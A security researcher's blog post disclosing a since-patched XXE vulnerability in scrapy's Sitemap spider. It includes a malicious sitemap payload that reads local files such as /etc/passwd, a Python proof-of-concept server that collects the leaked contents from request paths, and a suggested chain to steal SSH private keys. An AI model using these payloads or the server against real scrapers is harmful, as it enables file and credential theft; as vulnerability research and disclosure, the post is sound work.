Exploiting the scraper

Claudio Salazar
Apr 26, 2019

I’ve made some changes for clarity. This post was originally published in 2014: https://spect.cl/blog/2014/08/exploiting-the-scraper/

As some of you have noticed, my posting frequency has been low in recent years because I’ve been happily working full-time for more than two years at Scrapinghub, the company behind the popular scrapy framework. I’ve been working mostly on software projects, so I only do security research in my spare time.

scrapy is a powerful client-side framework for web scraping and it usually doesn’t involve server-side components, unless you run scrapyd to manage your scrapy spiders. So I was a bit worried about the security of scrapy: I use it daily and any vulnerability could affect me.

Well, scrapy uses lxml under the hood for HTML/XML processing, and with XML External Entity (XXE) attacks around, I wanted to test whether scrapy was vulnerable to them in some way. Indeed it was, as I described in this pull request, and in this post I’ll explain an automated way to exploit it.

Finding a vulnerable component

I knew that lxml was used in Selectors and in some kinds of spiders, like the Sitemap spider. Both components can handle XML files and were vulnerable, since they initialized their instance of XMLParser this way:

lxml.etree.XMLParser(recover=True, remove_comments=True)

According to the documentation, the resolve_entities argument is True by default, which made scrapy vulnerable to the above-mentioned XXE attacks.
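To see why that parser configuration was dangerous, here is a small sketch of my own (not code from scrapy) that only needs lxml. It uses an internal entity standing in for a SYSTEM entity that would read a local file such as /etc/passwd:

```python
from lxml import etree

# A document defining an internal entity; a real attack would use a
# SYSTEM entity pointing at a local file instead.
xml = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE root [<!ENTITY secret "leaked-content">]>'
       b'<root>&secret;</root>')

# Parser configured the way the vulnerable scrapy versions did it:
# resolve_entities defaults to True, so the entity gets expanded.
vulnerable = etree.XMLParser(recover=True, remove_comments=True)
print(etree.fromstring(xml, parser=vulnerable).text)

# Passing resolve_entities=False leaves the entity unexpanded.
safe = etree.XMLParser(recover=True, remove_comments=True,
                       resolve_entities=False)
print(etree.fromstring(xml, parser=safe).text)
```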

Before starting the search for vulnerabilities, I always think about a successful exploitation in which I could access/exfiltrate victim data. In this case, Selectors weren't a good spot since:

  1. I would have to create a malicious XML file.
  2. Serve it from a web server.
  3. A scrapy spider would parse it and trigger the vulnerability, but I didn't have a way to get the extracted data back to me.

Update 2019: I see that it could be possible to exfiltrate the data with an OOB XXE, but I’m not sure whether I tried it or whether it worked. Anyway, we’re discarding this option for the remainder of this post.

On the other hand, from experience I had seen that sitemaps sometimes reference nested sitemaps through Sitemap index files, and these are requested recursively. That way I could keep a flow between a server controlled by me and the victim scrapy spider, so that was the path I chose to exploit this vulnerability.

A bit more about sitemaps and Sitemap spider

Sitemaps are files that websites use to index their content. Usually they look like this:
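For example, a minimal urlset (the URLs are illustrative):

```xml
<?xml version="1.0" encoding="utf-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://example.com/page-1.html</loc>
    <lastmod>2014-08-01</lastmod>
  </url>
  <url>
    <loc>http://example.com/page-2.html</loc>
  </url>
</urlset>
```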

A scrapy sitemap spider will request every url in urlset and call a callback for each response, so on its own a successful attack gives us no way to get the data back. However, there are also sitemaps containing index files.

The thing is that a sitemap referenced from a sitemapindex can itself be a sitemapindex, so the spider keeps sending requests to our server for as long as we want. That way we maintain a flow with the victim spider, and every request is a chance to exfiltrate data.
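A sitemap index pointing at a further sitemap looks like this (again, the URLs are illustrative):

```xml
<?xml version="1.0" encoding="utf-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <sitemap>
    <loc>http://localhost:5000/nested-sitemap.xml</loc>
  </sitemap>
</sitemapindex>
```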

Exploiting the vulnerability in an automated way

To exploit this vulnerability we need a victim using the Sitemap spider. An example of this would be this simple spider:

On the server side, the steps are:

  • Create a server listening on port 5000 (matching the sitemap_urls attribute in the spider).
  • Create a malicious XML file as explained below:
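A sketch of such a file, assuming the server listens on localhost:5000; the entity name file_path is illustrative:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE sitemapindex [
  <!ENTITY file_path SYSTEM "file:///etc/passwd">
]>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <sitemap>
    <loc>http://localhost:5000/&file_path;.xml</loc>
  </sitemap>
</sitemapindex>
```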

We can set file_path to any file we want to read, and our file contains a nested sitemap with the payload that triggers the vulnerability.

  • As you can see from our malicious file, the next sitemap will be requested and its path will contain the contents of file_path. Now we have a way to retrieve the data from the victim.
  • Do we want only one file? No. We can answer that last request with our malicious file again and request more files.

Things get interesting when in the first response you put a payload to read /etc/passwd, receive its contents, reconstruct the list of real users (not system users), and in the next response read /home/%user/.ssh/id_rsa and bingo!

Two things to consider, both handled in the PoC: the sitemap loc needs to end in .xml, and frameworks like Bottle or Flask couldn’t handle the weird requests containing /etc/passwd contents, so I had to use the built-in HTTPServer.

The malicious server code is pasted below. It’s just a PoC.
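Here is a sketch of what such a server can look like, assuming it listens on port 5000 to match the spider’s sitemap_urls; PAYLOAD, ExfiltrationHandler and run are my names, not the ones from the original PoC:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

# Sitemap index with the XXE payload: the entity expands inside <loc>,
# so the spider's next request carries the file contents in its path.
PAYLOAD = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE sitemapindex [
  <!ENTITY file_path SYSTEM "file:///etc/passwd">
]>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <sitemap><loc>http://localhost:5000/&file_path;.xml</loc></sitemap>
</sitemapindex>
"""

class ExfiltrationHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Everything between the leading "/" and the trailing ".xml" is
        # exfiltrated file content smuggled into the request path.
        path = unquote(self.path)
        if path not in ("/", "/sitemap.xml"):
            print("[+] Exfiltrated data:")
            print(path.lstrip("/").rsplit(".xml", 1)[0])
        # Always answer with the malicious index so the spider keeps
        # requesting nested sitemaps and leaking data.
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.end_headers()
        self.wfile.write(PAYLOAD.encode())

def run():
    HTTPServer(("0.0.0.0", 5000), ExfiltrationHandler).serve_forever()
```

Calling run() starts the server; every request from the spider is logged and answered with the same malicious index, keeping the exfiltration loop going.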

And a video showing the exploitation is here. It reads the local file flag.txt of the victim.


The pull request fixing the vulnerability was discussed with the scrapy dev team and merged into master within a few days. It’s always good to see security issues resolved quickly.

I want to clarify that only versions <= 0.21 were vulnerable. Patched versions are available even in the Ubuntu repositories. After this, we agreed to open a security mailing list to address this kind of bug, which is a good initiative that I expect to keep contributing to.